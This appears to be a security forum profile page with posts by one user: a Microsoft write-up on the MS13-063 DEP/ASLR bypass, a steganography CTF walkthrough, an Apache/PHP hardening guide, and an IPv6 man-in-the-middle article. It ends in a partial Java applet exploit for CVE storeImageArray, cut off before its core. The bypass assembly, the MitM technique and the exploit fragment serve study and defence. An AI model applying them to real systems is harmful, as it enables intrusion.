Jump to content

Nytro

Administrators
  • Posts

    18735
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. Mitigating the LdrHotPatchRoutine DEP/ASLR bypass with MS13-063 swiat 12 Aug 2013 10:51 AM Today we released MS13-063 which includes a defense in depth change to address an exploitation technique that could be used to bypass two important platform mitigations: Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). As we’ve described in the past, these mitigations play an important role in making it more difficult and costly for attackers to exploit vulnerabilities. The bypass technique that has been addressed by MS13-063 was described by Yang Yu of NSFocus Security Labs at the CanSecWest security conference earlier this year. This bypass was also independently discovered by other researchers and was used by VUPEN in one of their exploits for the Pwn2Own 2013 contest as well. A few months ago, we released EMET 4.0 which included a mitigation for this specific bypass. In this blog post, we wanted to provide some background on how the bypass works and how it has been addressed by MS13-063. How the bypass works The bypass takes advantage of a predictable memory region known as SharedUserData that exists at a fixed location (0x7ffe0000) in every process on every supported version of Windows. On 64-bit versions of Windows prior to Windows 8, this region contains pointers to multiple functions in the 32-bit version of NTDLL that is used by WOW64 processes as shown below: The presence of these pointers at a predictable location in memory can enable an attacker to bypass ASLR if they have the ability to read anywhere in memory. In this case, the bypass technique takes things a step further by taking advantage of one of the functions listed above: LdrHotPatchRoutine. This function is part of the hotpatching support provided by Windows and one of the noteworthy things it does when called is load a DLL from a path that has been passed in as a field of the first parameter. This means that if an attacker can use a vulnerability to call LdrHotPatchRoutine, they could execute arbitrary code as a side effect of loading a malicious DLL of their choosing, such as from a UNC path, and thus bypass DEP implicitly. Depending on the vulnerability that is being exploited, it can be fairly straightforward for an attacker to trigger a call through the pointer to LdrHotPatchRoutine in SharedUserData with a controlled parameter, thus bypassing both ASLR and DEP. Use after free vulnerabilities involving C++ objects with a virtual table pointer are particularly well-suited for being able to apply this technique. These vulnerabilities have become a preferred vulnerability class of exploit writers in recent years. The reason use after free issues are particularly amendable is because attackers typically control the entire content of the C++ object that has been freed prior to a virtual method call. As such, an attacker only needs a virtual method call site where they can control the virtual table pointer being called through and the first parameter that is passed to the virtual method. For example, if we assume that EDX points to memory that is controlled by the attacker: mov ecx, [edx+0x4] ; load pointer to fake object into ECX mov eax, [ecx] ; load fake virtual table pointer 0x7ffe0344 into EAX push ecx ; push pointer to controlled content as first parameter call [eax+0xc] ; call [0x7ffe0344 + 0xc] which points to LdrHotPatchRoutine As a result of the above sequence, LdrHotPatchRoutine will be called and the DLL path referred to in the fake structure that is passed as the first parameter will be loaded, thus bypassing both ASLR and DEP. How the fix works The bypass described above relies on the fact that a pointer to LdrHotPatchRoutine can be found at a predictable location in memory. As such, one way to mitigate this bypass is to simply eliminate the predictable pointer to LdrHotPatchRoutine from SharedUserData. This is approach taken in the security update for MS13-063. After installing this update on Windows 7 64-bit, we can see that not only has the pointer to LdrHotPatchRoutine been eliminated, but in fact all other image pointers have been eliminated as well: As a result, not only is the LdrHotPatchRoutine bypass mitigated, but so is any other bypass that relies on leveraging the image pointers that were present in SharedUserData on 64-bit versions of Windows. The potential for abusing one or more of these pointers was something that we were aware of during the development of Windows 8 and as such we took steps to eliminate all image pointers from SharedUserData on both 32-bit and 64-bit versions of Windows 8. This is why Windows 8 was not susceptible to this bypass. It should be noted that although MS13-063 removes all image pointers from SharedUserData on 64-bit versions of Windows 7, there is still one image pointer present in SharedUserData on 32-bit versions of Windows 7 and prior (the SystemCall function pointer). For those who are curious, the pointers that were originally stored in SharedUserData have now been moved to an exported global data structure named LdrSystemDllInitBlock in NTDLL. This data structure is populated during process initialization with the required pointers. Since NTDLL is randomized by ASLR, an attacker cannot reliably predict where these pointers will be stored in memory. Bounty program Although we were already aware of the underpinnings of this bypass before it was publicly described, it is a great example of a technique that could have qualified for our recently announced Mitigation Bypass Bounty Program. This bounty program offers exceptional rewards (up to $100,000) for novel exploitation techniques that affect the latest versions of our products. In this case, the bypass was generic, could be made reliable, had reasonable requirements, applied to high impact user mode application domains, and had elements that made it novel. Discovering and mitigating exploitation techniques of this nature can help us make our platform safer and more secure by breaking the techniques that attackers rely on to develop reliable exploits. - Matt Miller and William Peteroy Special thanks to our colleagues in Windows Sustained Engineering for their work on shipping this defense in depth update. Sursa: https://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx?Redirected=true
  2. Steganography: What your eyes don’t see Soufiane Tahiri August 14, 2013 Steganography is the art of hiding information to prevent detection of a hidden message. It has been used throughout history by many methods and variation, ancient Greeks shaved heads of messengers and tattooed the secret message, once the heir grew back the message remained undetectable until the head is shaved again. Many ingenious techniques and methods were used by ancient civilizations. Earlier and near World War II invisible inks offered a common form of undetectable writing. An innocent letter could contain a very different message written between their lines. It’s a security trough obscurity approach, theoretically, apart from the sender and the recipient no one is supposed to suspect the existence of the hidden message. Digital technologies and informatics gave us new ways to apply Steganography and this by the most intriguing techniques like hiding information in digital images. Steganography and cryptography belong to the same “big family”, if cryptography scrambles a message so it cannot be read. Steganography just hides it to not attract attention and this is the advantage that Steganography takes over cryptography. Trough this article I’ll demonstrate how a hidden “key” is stored in a “innocent looking” picture, the file we will study is a problem taken from a CTF (Capture the Flag, a computer security competition) Analyzing the target The file we know has a hidden message within it is a JPG file that simply looks like this (check references for download link): The original file name was “spamcarver” which is itself a hint, according to Wikipedia; file carving is the process of reassembling computer files from fragments in the absence offilesystem metadata, the craving process, makes use of knowledge of common file structures (information contained in files, and heuristics regarding how filesystems fragment data). Fusing these three sources of information, a file carving system infers which fragments belong together. This is enough to push us to explore the JPEG file structure. An In-depth sight into JPEG file format Every image file that uses JPEG compression is commonly called a JPEG file, and is considered as variant of JIF image format, and most images captured by recent devices such as digital cameras creates files in EXIF format (Exchangeable image file format), a format standardized for metadata interchange, since the Exif standard does not allow color profiles. Most image editing software stores JPEG in JFIF format, and also includes the APP1 segment from the Exif file to include the metadata in an almost-compliant way; the JFIF standard is interpreted somewhat flexibly. Technically, every JPEG file just like any other object has a beginning or header, called “Start of Image” and a trailer called “End of Image”, every JPEG file starts from the binary value ‘0xFFD8‘ and ends by the binary value ’0xFFD9‘. A JPEG file contains binary data starting by FF called Markers and has a basic format like this: 0xFF+Marker Number (1 byte) +Data size (2 bytes) +Data (n bytes). Some Markers are used to describe data, after the Start of Stream Marker which starts the JPEG image stream that ends by the End of Image Marker. Here is a basic JPEG file format structure: This seems to be enough to start studying our given image. Problem analysis Before trigging our hexadecimal editor, let’s just do some “routine” tasks like checking the picture using some standard tools to get some additional information about this file. In a Windows 7 machine, I installed GnuWin32 to get some *unix commands like “file” which determines file type and applies it on our target. Installing GnuWin32 Start by downloading automated gnuwin32 download tool (GetGnuWin32-0.6.3.exe link on references section), then extract it to the desired folder, the installation process is quite simple even if it’s command line based, so using windows command prompt (CMD) to navigate the extracted location and run “download.bat”. This will download automatically all the available GnuWin32 packages to the same directory, if you are prompted to do something just accept the defaults. After the download is finished and remaining on the command prompt you need to install all downloaded packages by typing: C:\PathWhereYouDownloaded\GetGnuWin32\> install c:\gnuwin32 this will install all downloaded packages to c:/gnuwin32 directory. The last step is to add this new directory to the Environment Variables do this by right clicking on “My Computer” then “Properties” and click on “Advanced system settings” (or something similar) In the System Properties window click on “Environment Variables” button, in the Environment Variables window (as shown below), select “Path ” variable in the Systems Variable section and click the Edit button. Modify the path line by adding “;c:\gnuwin32“ (without quotes as shown below): Let’s now use “file” command: As expected this is a valid JPEG file stored in JFIF format, we can get even more information using another tool called “ExifTool” (You can download the link from the references section) which can help us with handling and manipulating images metadata: Until now, everything seems legit and the file seems to be a valid JPEG file which leaves us the ultimate and efficient method: doing it by hands, the old school way! Let’s open our image file using a hexadecimal editor and focus on its structure; now we know that every JPEG file starts by 0xFFD8 and ends with 0xFFD9: FFD8 is the Start of Image Marker, FFE0 is an Application Marker which is used to insert digital camera configuration and thumbnail image and it doesn’t interest us. Let’s try to find the trailer of our file (the End of Image Marker) which is equal to 0xFFD9, so using your hexadecimal editor try to find the value “FFD9?. To do this using WinHex, click on “Find Hex Values” on the window that appears taped in the hexadecimal value you want to find then click “OK” And guess what two hits were found which is not “very” normal, click on the first hit to get to its offset Things get more intriguing, well basically this means that something’s appended to the JPEG file. The JPEG file should end on FFD9 but exactly after the supposed end of image an interesting 504B0304……. with lot of other binary data appear. If you are habituated to reverse engineering you can easily see that this is in fact the header of a normal PKZip file, even if you are not, a quick Google search will reveal it. Let’s now study the binary data that appends after the end of the image marker. A sight into PKZip file format Each PKZip file (or simply ZIP file) mainly has this structure: And it may contain many local files headers, many local files data and many data descriptors of course there are lots of other technical details that I won’t explain in this paper. Each Local File header is structured in the following manner: [TABLE] [TR] [TD]Signature[/TD] [TD=width: 307]The signature of the local file header is always 0x504b0304[/TD] [/TR] [TR] [TD=width: 307]Version[/TD] [TD=width: 307]The PKZip version needed for archive extraction[/TD] [/TR] [TR] [TD=width: 307]Flags[/TD] [TD=width: 307]Bit 00: encrypted fileBit 01: compression optionBit 02: compression option Bit 03: data descriptor Bit 04: enhanced deflation Bit 05: compressed patched data Bit 06: strong encryption Bit 07-10: unused Bit 11: language encoding Bit 12: reserved Bit 13: mask header values Bit 14-15: reserved[/TD] [/TR] [TR] [TD=width: 307]Compression method[/TD] [TD=width: 307]00: no compression01: shrunk02: reduced with compression factor 1 03: reduced with compression factor 2 04: reduced with compression factor 3 05: reduced with compression factor 4 06: imploded 07: reserved 08: deflated 09: enhanced deflated 10: PKWare DCL imploded 11: reserved 12: compressed using BZIP2 13: reserved 14: LZMA 15-17: reserved 18: compressed using IBM TERSE 19: IBM LZ77 z 98: PPMd version I, Rev 1[/TD] [/TR] [TR] [TD=width: 307]File modification time[/TD] [TD=width: 307]Bits 00-04: seconds divided by 2Bits 05-10: minuteBits 11-15: hour[/TD] [/TR] [TR] [TD=width: 307]File modification date[/TD] [TD=width: 307]Bits 00-04: day Bits 05-08: month Bits 09-15: years from 1980[/TD] [/TR] [TR] [TD=width: 307]Crc-32 checksum[/TD] [TD=width: 307]CRC-32 algorithm with ‘magic number’ 0xdebb20e3 (little endian)[/TD] [/TR] [TR] [TD=width: 307]Compressed size[/TD] [TD=width: 307]If archive is in ZIP64 format, this filed is 0xffffffff and the length is stored in the extra field[/TD] [/TR] [TR] [TD=width: 307]Uncompressed size[/TD] [TD=width: 307]If archive is in ZIP64 format, this filed is 0xffffffff and the length is stored in the extra field[/TD] [/TR] [TR] [TD=width: 307]File name length[/TD] [TD=width: 307]The length of the file name field below[/TD] [/TR] [TR] [TD=width: 307]Extra field length[/TD] [TD=width: 307]The length of the extra field below[/TD] [/TR] [TR] [TD=width: 307]File name[/TD] [TD=width: 307]The name of the file including an optional relative path. All slashes in the path should be forward slashes ‘/’.[/TD] [/TR] [TR] [TD=width: 307]Extra field[/TD] [TD=width: 307]Used to store additional information. The field consists of a sequence of header and data pairs, where the header has a 2 byte identifier and a 2 byte data size field.[/TD] [/TR] [/TABLE] In addition to this, every PKZip has a signature used to show the end of the Central Directory which is “0x504B0506?, in other words, every ZIP file is started by “0x504B0304? and is ended by “0x506B0506?. Let’s get back to our JPEG file where we left it: Here I marked with different colors bytes that need explanation based on the table above: [TABLE] [TR] [TD]Signature[/TD] [TD]0x504B0304[/TD] [/TR] [TR] [TD]Version[/TD] [TD]0×14 = 20d means version 2.0[/TD] [/TR] [TR] [TD]Flags[/TD] [TD]Bit 02: compression option[/TD] [/TR] [TR] [TD]Compression method[/TD] [TD]08: deflated[/TD] [/TR] [TR] [TD]File modification time[/TD] [TD]0x02F4 (little endian)[/TD] [/TR] [TR] [TD]File modification date[/TD] [TD]0x419F (little endian)[/TD] [/TR] [TR] [TD]Crc-32 checksum[/TD] [TD]0x9CD950D4 (little endian)[/TD] [/TR] [TR] [TD]Compressed size[/TD] [TD]0x2DE3 = 11747 bytes[/TD] [/TR] [TR] [TD]Uncompressed size[/TD] [TD]0xE299 = 58009 bytes[/TD] [/TR] [TR] [TD]File name length[/TD] [TD]0×8 bytes[/TD] [/TR] [TR] [TD]Extra field length[/TD] [TD]0x1C[/TD] [/TR] [TR] [TD]File name[/TD] [TD]0×2020202020202020 = 8 times space bare[/TD] [/TR] [TR] [TD]Extra field[/TD] [TD]0×5455 extended timestamp, size: 5 bytes[/TD] [/TR] [/TABLE] We know enough to think about extracting this zip file from the given JPEG file, we know the header of the file, how the file is structured and that this last contains a file named ” “with no extension! The easiest way to proceed in order to “dump” the zip embedded within the JPEG file is copying all bytes starting from the header of the ZIP until its trailer, which means, from the first “504B0304?until the end of the Central Directory meaning “506B0506? located in general at the end of file streaming: Using your hexadecimal editor go to the offset 0XCB8E to find the beginning of the zip file, then select all bytes until the offset 0xFA04, copy data into new file and save it as a ZIP file: If you are using WinHex right click on the exact offset then select “Edit -> Copy Block -> Into New File” A “Save File as” window appears; give your file a name.zip Checking the dumped Zip file Using “file” command tells us that indeed this is a valid zip file: C:\Users\Soufiane>file C:\Users\Soufiane\Desktop\stegano\dumpedPK.zip C:\Users\Soufiane\Desktop\stegano\dumpedPK.zip; Zip archive data, at least v2.0 to extract Now let’s try to extract our compressed archive (you can use whatever software you want) I’ll keep on using commands given by GnuWin32, so: C:\Users\Soufiane>unzip C:\Users\Soufiane\Desktop\stegano\dumpedPK.zip Archive: C:/Users/Soufiane/Desktop/stegano/dumpedPK.zip error: cannot create Remember the name of the file inside the zip file? An eight space name and this kind of file names can in fact cause some unzipping problems, so let’s get back to the dumped zip file and using the hexadecimal editor, we will change the name by something more usual. What you have to do is making a hexadecimal search (like the one we did before) and try to find “2020202020202020? then changing it by whatever you like. According to the PKZip file structure you are supposed to find two hints one in the beginning of the zip file and one in its end: Change these values using the same thing: Save and try to extract again: C:\Users\Soufiane\Desktop\stegano>unzip C:\Users\Soufiane\Desktop\stegano\dumpedPK.zip Archive: C:/Users/Soufiane/Desktop/stegano/dumpedPK.zip inflating: NoSpaces Yes! A file called “NoSpaces” is now created; let’s see what kind of files is this: The zip file contained in reality another JPEG file, rename the extracted file to “NoSpaces.jpeg” and let’s see how it looks: It’s a working JPEG file containing the key we were asked! Conclusion In this paper we learned that Steganography is not only this enigmatic art strictly based on mathematics and complex algorithms, we saw how a simple image file can hide any other file just by handling and understanding file structures, I tried to introduce you some common file structures that are JPEG and PKZip files and we saw how a hexadecimal editor can help us investigating files. Hope you learned something new! References http://www.creangel.com/papers/steganografia.pdf http://en.wikipedia.org/wiki/Steganography en.wikipedia.org/wiki/File_carving http://www.faqs.org/faqs/jpeg-faq/part1/section-15.html http://www.utica.edu/academic/institutes/ecii/publications/articles/A0B1F944-FF4E-4788-E75541A7418DAE24.pdf http://www.pkware.com/documents/casestudies/APPNOTE.TXT http://members.tripod.com/~petlibrary/ZIP.HTM http://en.wikipedia.org/wiki/List_of_file_signatures http://www.pkware.com/documents/APPNOTE/APPNOTE-6.3.0.TXT https://users.cs.jmu.edu/buchhofp/forensics/formats/pkzip.html#general Target used : Steganography-UnZipMe.zip GetGnuWin32: getgnuwin32.sourceforge.net Sursa: Steganography: What your eyes don’t see
  3. Da, iar lista nu e completa. Nu vii tu cu niste completari? :->
  4. Hacker Proofing Apache & PHP Configuration Aditya Balapure August 14, 2013 SECURING APACHE Apache has been truly one of the dominant web servers of the World Wide Web. It’s one of the best open source projects, Web Server for both the Windows and the NIX platform. It’s maintained by the open source community under the name Apache Software Foundation. Now first we will learn about the techniques to how harden our Apache configuration for a safer web experience. Security 101- DENY ALL Always remember it’s the best security to deny all and only allow specific services, ports and firewall rules as per the configuration. So the same goes for Apache as well, we follow a whitelisting technique to deny all and only allow what is required. Hence what we have done here is to block access to all the directories. These configurations and changes have to be done in the main configuration file of Apache, or if you are using a newer version of Ubuntu/ Backtrack r3 they can be found under/etc/apache2/conf.d/security Now let’s allow what we really require, access to a particular folder XYZ. So we make some more changes to the configuration file. Security 102- Disabling Directory Indexing This vulnerability basically displays all the files in a particular directory, if the base file like index.php index.html is not available. On a few default configurations it’s enabled by default and causes the exploit. We can remove this by: Security 103- Disable HTTP TRACE Method Now TRACE method simply echoes back the received request for a client so that he may see what changes or additions have been done. Attackers can abuse this functionality to gain access to sensitive information via headers like cookies and authentication data. This may be disabled by: Security 104- Removing the default files Having the default files of Apache in a live web server environment is really bad. These may be used to fingerprint the apache version and even the operating system at times. This ultimately helps to obfuscate our running web server. Security 105 – Disable server tokens and signatures It’s a good security practice to disable server signatures Security 106 – Remove Default Error Pages It’s a good security practice to remove default error pages offered by Apache. This ultimately makes it difficult for the attackers to identify what web server or version you’re running on. Hence it’s advised to create custom pages for errors, bugs and functionality problems in a particular application. Security 107 – Disable WebDAV WebDAV stands for Web Distributed Authoring and Versioning which aids in the download/upload of files and the ability work with those files on a remote web server. It’s basically required to run a SVN server, hence it would be advisable to disable WebDAV in online websites due to the high denial vulnerability of service attacks via PROFIND, PROPATCH or LOCK requests with a huge XML body. Here is how we remove/disable WebDAV: Security 108 – Setup a chroot environment for your website Chroot is a process to change the apparent disk root to another root directory. Hence once we have changed the root to another directory we cannot access files outside that particular directory. It’s also known as a jailed environment/chroot jail. So when working in a chroot environment an application is inaccessible to the parent disk and other resources. This is a security practice because helps protect from malicious users of hosted websites on the server from accessing the operating system’s files. Such similar instances may be created for different websites hosted on the same server which, blocks access of malicious scripts/virus from one site to the other. Security 109 – Distribute Ownership and don’t be Root It is recommended to avert from running Apache as a root user since malicious users may gain full access to the whole server by using potential bad scripts. If the webserver hosts a multiple number of sites then files for different sites should be owned by different users. This ultimately helps in preventing access from one site to another so, if one gets infected the others are safe. Security 110 – Don’t forget to install security updates It’s best advised to install security updates and patches which may be released by the organization for fixes against some vulnerabilities. This prevents our server from being susceptible to the same exploits from open disclosure sites. Securing PHP Now let’s move to securing our PHP configuration to prevent various server side attacks, which may be possible if left insecure. Security 101 – Disable PHP information It is recommended to disable PHP information to the outside world since it helps us protect the current version of PHP we run from the outside world. If the PHP information is turned there can be instances in which the PHP version may be seen in the HTTP headers. Here is how we disable it: Security 102- Log all Errors It is always advised to log all PHP errors and avoid them from being displayed. Here is how to do it: Security 103- Disallow File Uploads All types of file uploads should be disabled by default. If the application requires certain files to be uploaded then it should be thoroughly checked for proper extensions, parsed for malicious scripts and kept in a sandboxed location. All external data should be treated as unsafe and should not be trusted upon. Here is how to do it: Security 104 – Disallow Remote Code Execution This option if enabled allows the website to retrieve data from a remote website through include etc. It may allow an attacker to inject malicious URLs from his websites and include/parse it through the local PHP interpreter for a command execution. Hence this is important to prevent against code injection vulnerabilities. It’s also advised to filter any inputs which are to be received from users. Here is how we do it: Security 105 – Disabling Privileged Functions There is a long list of PHP functions which should be disabled to protect the PHP configuration. The functions are- exec – This is used for executing an external command. [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]<?php echo exec('ls -A'); ?> [/TD] [/TR] [/TABLE] passthru – This function executes an external program and displays raw output. [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]<?php echo passthru('ls -A'); ?> [/TD] [/TR] [/TABLE] system – This executes an external program and displays the output. [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]<?php echo system('ls'); ?> [/TD] [/TR] [/TABLE] shell_exec – This executes the command through shell and returns the complete output as a string. [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]<?php echo shell_exec('ls'); ?> [/TD] [/TR] [/TABLE] proc_open – This executes a command and opens file pointers for input/output proc_close – This closes a process opened up by proc_open and returns the exit code of that process. popen- This basically opens a pipe to the program specified in the command interpreter. Few other functions which should be disabled are curl_exec,curl_multi_exec,parse_ini_file,show_source Here is how we do it: Security 106 – Limit PHP access to file system In most web server setups it’s strictly advised that the web applications are not allowed to read files outside of the web root directory. All the web server files are generally located under /var/www unless a customization is done. Hence we restrict the PHP applications to act outside this directory by using the open_basedir as shown below: Security 107 – Turning on Magic Quotes The magic quotes features gives PHP the ability to automatically escape quotes, backslashes and Nulls with a backslash. Hence it filters any unwanted quotes which might have been passed by a malicious user to the application. This might prevent XSS, SQL injection and some other attacks by the malicious user. Security 108 – Disabling Register Globals This directive takes input from GET, POST, session variables, uploaded files, which are directly accessible as global variables. Suppose we have a URL http://www.example.com/xyz.php?input=TRUE It has a query string at the end of the URL, now any value entered will directly affect the value of the variable. Hence it will allow any malicious user to inject any global variable in the code without any control. The easiest method to do this would be to include a line in the .htaccess file. php_flag register_globals off References DIY: Harden Apache web servers with these tips - TechRepublic Apache 2.0 Hardening Guide 10 Apache Security and Hardening Tips | Kyplex cloud security Linux: 25 PHP Security Best Practices For Sys Admins Dangerous php functions - Stack Overflow PHP: Program execution Functions - Manual PHP popen() Function Configuration Auditing php.ini To Help Prevent Web Application Attacks | Tenable Network Security https://www.owasp.org/index.php/Configuration#PHP_Configuration php - Why is REGISTER_GLOBALS so bad? - Stack Overflow Sursa: Hacker Proofing Apache & PHP Configuration
  5. Da, m-am uitat si eu prin sursa, evident, nu e complet. S-a incercat rescrierea de la 0 a sistemului de operare Windows XP. Sansele de reusita sunt extrem de mici date fiind: 1. E un proiect EXTREM de complex 2. Cunostintele necesare pentru a putea colabora la proiect sunt la nivelul > avansat 3. Sunt foarte putini oameni care pot contribui si care o fac Pana sa se ajunga la o versiune stabila vor mai trece multi ani, asta daca se va continua proiectul. Insa ca utilitate, e foarte interesant sa te uiti in codul sursa si sa intelegi cum functioneaza kernelul din Windows.
  6. Am stat si eu vreo 2 minute pe geam dar nu am vazut nimic. Cam cat de des apar? Una la 5-10 minute, sau mai rar?
  7. Cum adica 24/48? Salariul cred ca esti mai mic decat minimul pe economie, nici nu cred ca e legal sa fie atat. Despre ce job e vorba? La Carrefour, Cora, Kaufland probabil e mai ok. In programare, pana si internship-urile sau part time-urile sunt platite de la 1000 RON in sus.
  8. Care era problema, ca acceptam doar proiecte facute de la 0 si nu acceptam surse copiate? De fapt, aici se da ban pentru asa ceva, nu doar ca nu se posteaza la RST Power. Fa o porcarie, dar fa-o tu, nu iei un cod de pe Google, pui pe el "by Blondas" si gata, esti programator. Bine, in cazul tau, ai luat din mai multe surse si le-ai pus intr-un loc. Adica egal cu 0, acelasi lucru.
  9. RST e pe prima pagina la cautari ca "invitatie filelist", "invitatii filelist", "cont filelist". Asa cum sunt multi utilizatori care au ajuns aici pentru "Conquiztador killer" dar care au evoluat, asa speram si ca valul de utilizatori ajunsi aici cautand asa ceva sa invete lucruri noi si sa evolueze.
  10. Researchers demonstrate how IPv6 can easily be used to perform MitM attacks Many devices simply waiting for router advertisements, good or evil. When early last year I was doing research for an article on IPv6 and security, I was surprised to learn how easy it was to set up an IPv6 tunnel into an IPv4-only environment. I expected this could easily be used in various nefarious ways. I was reminded of this when I read about a DEFCON presentation on using IPv6 to perform a man-in-the-middle attack on an IPv4-connected machine. I did not attend DEFCON, but the presenters Brent Bandelgar and Scott Behrens provided details in a blog post for their company Neohapsis as well as in their presentation slides. Moreover, they shared the source code of the tool they developed on Github. The attack refines the proof of concept of an attack possibility described in 2011, by making it also work against Windows 8 and providing a bash script that is supposed to work out-of-the-box. This script will no doubt be popular among penetration testers, but also shows possibilities for those with malicious motives. For me, the script didn't work right away, but some minor tweaks got it working, after which the traffic from my wife's Windows 7 laptop was flowing through my virtual Ubuntu server. And while I didn't even attempt to read the traffic generated by this 'husband-in-the-middle' attack, I could have done. I could also have performed a similar attack in a local Starbucks. The attack makes use of the fact that all modern operating systems support both IPv4 and IPv6 connections. This in itself is a good thing for the migration towards IPv6, as is the fact that the IPv6 connection, if available, takes precedence. Moreover, operating systems such as Windows 7 and 8 have DHCPv6, the IPv6-version of DHCP, enabled by default. This means that if they haven't already got an IPv6 connection, they will obtain one from any DHCPv6 server running on the local network. This is what the Neohapsis researchers do to get machines to connect to their device. As this merely allows them to capture IPv6 traffic in a IPv4-only network, they then use a protocol called NAT64 to allow their server to route this traffic to the IPv4-Internet. NAT64 is one of several protocols used to make the migration towards IPv6 easier: it allows IPv6-only networks to connect to IPv4-only services on the Internet. NAT64 in a rogue set-up, with the NAT64 server on the right. It works by setting up a DNS server that returns IPv6 addresses in which the IPv4 address is embedded. If a request is made for the AAAA record (IPv6 address) of a domain, the response will be an address in some predefined /96 IPv6 subnet - that is, a subnet in which all but the final 32 bits are fixed. These 32 bits will be the A record (IPv4 address) for the same domain. Say, for example, the subnet is 2001:db9:1:ffff::/96 and a request is made for Virus Bulletin : Independent Malware Advice, then the response will be 2001:db9:1:ffff::6dc8:041a. Indeed, 6dc8:041a is the hexadecimal representation of 109.200.4.26, the IPv4 address of Virus Bulletin : Independent Malware Advice. Requests to this IPv6 address will then be routed through the server running NAT64 - in this case, the server set up by the attackers. They are thus able to see all traffic from the now IPv6-connected machine, except that in which the IP address is hard-coded. Of course, in principle this means they can only read traffic that isn't encrypted, but that still allows for many possible attacks with serious consequences. At the same time, the fact that the intercepting device runs on the same local network might make performing cryptographic timing attacks such as Lucky Thirteen easier. To see the possibilities for malware that is able to intercept all traffic, one just needs to look at a 2011 variant of the TDSS rootkit which set up its own IPv4 DHCP server. In that case, however, the malware had to compete with the real DHCP server, while in this case the fact that IPv6 always takes precedence over IPv4 means there is no such competition. The simplest way to fend off this kind of attack is to turn off IPv6 on devices that do not need it. This will, of course, hinder the migration towards IPv6 and may not be an option for transportable devices, as these may sometimes find themselves in an environment where IPv6 connectivity is needed. The researchers also mention RFC6105, an informational document published by the IETF on how to deal with rogue router advertisements, as a possible defence strategy. But ultimately, the best way to defend against these kinds of attacks will be to make sure the device always has an IPv6 connection. Attacks such as this one will not work on devices that are already IPv6-connected. Sursa: Virus Bulletin : Blog - Researchers demonstrate how IPv6 can easily be used to perform MitM attacks Vedeti link-urile.
  11. Pentru ca ca codul e scris in C si nu in C++. Mirror: http://packetstormsecurity.com/files/download/122779/Formatul_Fisierelor_PE.pdf
  12. Mirror: http://www.exploit-db.com/wp-content/themes/exploit/docs/27516.pdf
  13. Oracle Java storeImageArray() Invalid Array Indexing Code Execution Site packetstormsecurity.com Oracle Java versions prior to 7u25 suffer from an invalid array indexing vulnerability that exists within the native storeImageArray() function inside jre/bin/awt.dll. This exploit code demonstrates remote code execution by popping calc.exe. It was obtained through the Packet Storm Bug Bounty program. import java.awt.image.*;import java.awt.color.*; import java.beans.Statement; import java.security.*; public class MyJApplet extends javax.swing.JApplet { /** * Initializes the applet myJApplet */ @Override public void init() { /* Set the Nimbus look and feel */ //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) "> /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel. * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html */ try { for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) { if ("Nimbus".equals(info.getName())) { javax.swing.UIManager.setLookAndFeel(info.getClassName()); break; } } } catch (ClassNotFoundException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (InstantiationException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (IllegalAccessException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (javax.swing.UnsupportedLookAndFeelException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } //</editor-fold> /* Create and display the applet */ try { java.awt.EventQueue.invokeAndWait(new Runnable() { public void run() { initComponents(); // print environment info logAdd( "JRE: " + System.getProperty("java.vendor") + " " + System.getProperty("java.version") + "\nJVM: " + System.getProperty("java.vm.vendor") + " " + System.getProperty("java.vm.version") + "\nJava Plug-in: " + System.getProperty("javaplugin.version") + "\nOS: " + System.getProperty("os.name") + " " + System.getProperty("os.arch") + " (" + System.getProperty("os.version") + ")" ); } }); } catch (Exception ex) { ex.printStackTrace(); } } public void logAdd(String str) { txtArea.setText(txtArea.getText() + str + "\n"); } public void logAdd(Object o, String... str) { logAdd((str.length > 0 ? str[0]:"") + (o == null ? "null" : o.toString())); } public String errToStr(Throwable t) { String str = "Error: " + t.toString(); StackTraceElement[] ste = t.getStackTrace(); for(int i=0; i < ste.length; i++) { str += "\n\t" + ste.toString(); } t = t.getCause(); if (t != null) str += "\nCaused by: " + errToStr(t); return str; } public void logError(Exception ex) { logAdd(errToStr(ex)); } public static String toHex(int i) { return Integer.toHexString(i); } /** * This method is called from within the init() method to initialize the * form. WARNING: Do NOT modify this code. The content of this method is * always regenerated by the Form Editor. */ @SuppressWarnings("unchecked") // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents private void initComponents() { btnStart = new javax.swing.JButton(); jScrollPane2 = new javax.swing.JScrollPane(); txtArea = new javax.swing.JTextArea(); btnStart.setText("Run calculator"); btnStart.addMouseListener(new java.awt.event.MouseAdapter() { public void mousePressed(java.awt.event.MouseEvent evt) { btnStartMousePressed(evt); } }); txtArea.setEditable(false); txtArea.setColumns(20); txtArea.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N txtArea.setRows(5); txtArea.setTabSize(4); jScrollPane2.setViewportView(txtArea); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE) .addContainerGap()) .addGroup(layout.createSequentialGroup() .addGap(242, 242, 242) .addComponent(btnStart, javax.swing.GroupLayout.PREFERRED_SIZE, 124, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) ); 